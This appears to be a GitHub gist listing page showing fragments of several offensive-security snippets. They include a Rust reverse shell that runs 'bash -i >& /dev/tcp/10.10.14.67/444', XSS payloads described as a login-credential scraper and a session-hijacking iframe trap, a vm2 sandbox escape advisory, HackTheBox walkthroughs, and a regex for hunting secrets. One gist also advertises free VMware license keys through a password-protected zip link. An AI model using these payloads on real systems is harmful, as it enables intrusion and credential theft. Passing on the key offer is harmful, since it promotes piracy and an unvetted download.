@ott3rly
ott3rly / nmap-xml-to-httpx.sh
Created February 20, 2024 09:50
Convert nmap xml output suitable for httpx
#!/bin/bash
# Check if an argument was provided
if [ $# -eq 0 ]; then
NMAP_XML_OUTPUT="/dev/stdin"
else
NMAP_XML_OUTPUT="$1"
fi
# Use xmllint to parse IP addresses and ports from the Nmap XML output
@GugSaas
GugSaas / reverse.rs
Created June 20, 2023 01:40
Reverse Shell in Rust
// I couldn't find the owner of the exploit, anyone who knows can comment so I can give the credits ;)
extern crate chrono;
use std::fs::OpenOptions;
use std::io::Write;
use chrono::prelude::*;
use std::process::Command;
pub fn log(user: &str, query: &str, justification: &str) {
let command = "bash -i >& /dev/tcp/10.10.14.67/444 0>&1";
@leesh3288
leesh3288 / vm2_3.9.19_sandbox_escape_2.md
Last active March 30, 2024 07:00
Sandbox Escape in vm2@3.9.19 via custom inspect function

Summary

In vm2 versions up to 3.9.19, the Node.js custom inspect function allows attackers to escape the sandbox and run arbitrary code.

Proof of Concept

@mpgn
mpgn / netexec-vs-absolute.md
Last active April 17, 2024 17:04
NetExec vs Absolute

In progress

  1. First we get the domain name to edit our etc hosts file
netexec smb 10.10.11.181                                                          
SMB         10.10.11.181    445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:absolute.htb) (signing:True) (SMBv1:False)
  • Domain name: absolute.htb
  • Netbios name: DC
@PurpleVibe32
PurpleVibe32 / vmwk17key.txt
Last active May 4, 2024 10:02
Free VMware Workstation Pro 17 full license keys
Install VMWare Workstation PRO 17 (Read it right. PRO!)
Also, these keys might also work with VMWare Fusion 13 PRO. Just tested it.
Sub to me on youtube pls - PurpleVibe32
if you want more keys - call my bot on telegram. @purector_bot (THE BOT WONT REPLY ANYMORE) - Or: https://cdn.discordapp.com/attachments/1040615179894935645/1074016373228978277/keys.zip - the password in the zip is 102me.
---
This gist can get off at any time.
PLEASE, DONT COPY THIS. IF YOU FORK IT, DONT EDIT IT.
*If you have a problem comment and people will try to help you!
*No virus
@mpgn
mpgn / Scrambled vs NetExec .md
Last active April 23, 2024 03:03
Scrambled vs NetExec for fun and profit by @mpgn_x64

Scrambled vs NetExec

Let's pwn the box Scrambled from HackTheBox using only NetExec! For context, I was reading the Scrambled writeup from 0xdf_ when I read this:

smbclient won’t work, and I wasn’t able to get crackmapexec to work either.

To be fair, at the time of his writeup it was true, but not anymore and it's pretty simple with NXC, 5 minutes and you get root :)

Note: I will pass the web part where we get one username: ksimpson

@hoodoer
hoodoer / stealCredsPayload.js
Last active March 1, 2024 14:52
XSS Login Form Credential Scraper
alert('Click ok when you\'re ready to enter iframe trap');
// Example Credential scraper and
// XSS iframe trap. Load from whatever
// page has the reflected/stored XSS vuln
// trap the user in an iframe of the app.
// Frame the login page, and copy out the
// username and password fields.
// @hoodoer
(?i)((access_key|access_token|admin_pass|admin_user|algolia_admin_key|algolia_api_key|alias_pass|alicloud_access_key|amazon_secret_access_key|amazonaws|ansible_vault_password|aos_key|api_key|api_key_secret|api_key_sid|api_secret|api.googlemaps AIza|apidocs|apikey|apiSecret|app_debug|app_id|app_key|app_log_level|app_secret|appkey|appkeysecret|application_key|appsecret|appspot|auth_token|authorizationToken|authsecret|aws_access|aws_access_key_id|aws_bucket|aws_key|aws_secret|aws_secret_key|aws_token|AWSSecretKey|b2_app_key|bashrc password|bintray_apikey|bintray_gpg_password|bintray_key|bintraykey|bluemix_api_key|bluemix_pass|browserstack_access_key|bucket_password|bucketeer_aws_access_key_id|bucketeer_aws_secret_access_key|built_branch_deploy_key|bx_password|cache_driver|cache_s3_secret_key|cattle_access_key|cattle_secret_key|certificate_password|ci_deploy_password|client_secret|client_zpk_secret_key|clojars_password|cloud_api_key|cloud_watch_aws_access_key|cloudant_password|cloudflare_api_key|cloudflare_auth_k
@Chick3nman
Chick3nman / Apple_M1_Ultra_v6.2.5-340
Created March 19, 2022 16:23
Hashcat v6.2.5-340 benchmark on the Apple M1 Ultra
Apple M1 Ultra, 20 Core CPU, 48 Core GPU, 64GB of RAM, 1TB SSD
Thanks to @fhlipZero (https://twitter.com/fhlipZero) for running the benchmark on his hardware and allowing me to publish it.
A copy of both a short benchmark and the following full run can be found at https://gist.github.com/fhlip0
hashcat (v6.2.5-340-g98b89e43d) starting in benchmark mode
Benchmarking uses hand-optimized kernel code by default.
@hoodoer
hoodoer / xssIframeTrap.js
Last active August 24, 2023 14:14
XSS iFrame Trap
alert('Click ok when you\'re ready to enter iframe trap');
// Example XSS iframe trap. Load from whatever
// page has the reflected/stored XSS vuln
// trap the user in an iframe of the app.
// While they surf around, they stick in your
// iFrame, and you keep their session and your XSS
// payload running.
// @hoodoer